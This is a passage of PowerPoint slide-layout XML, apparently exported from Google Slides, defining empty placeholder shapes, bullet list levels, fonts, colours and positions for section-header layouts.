            <a:lvl3pPr indent="-311150" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-311150" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-311150" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-311150" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-311150" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-311150" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-311150" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5001318" y="1055328"/>
            <a:ext cx="3419700" cy="665400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p13"/>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Sections 1">
  <p:cSld name="7_Section Header_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="137" name="Shape 137"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722912" y="1689197"/>
            <a:ext cx="3173100" cy="2648700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-311150" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-311150" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-311150" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-311150" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-311150" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-311150" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-311150" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-311150" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441770" y="1442063"/>
            <a:ext cx="15900" cy="2357700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6CADDF"/>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140" name="Google Shape;140;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722906" y="1320769"/>
            <a:ext cx="3419700" cy="336300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="600">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5001318" y="1689197"/>
            <a:ext cx="3173100" cy="2648700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-311150" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-311150" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="—"/>
              <a:defRPr sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-311150" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="•"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
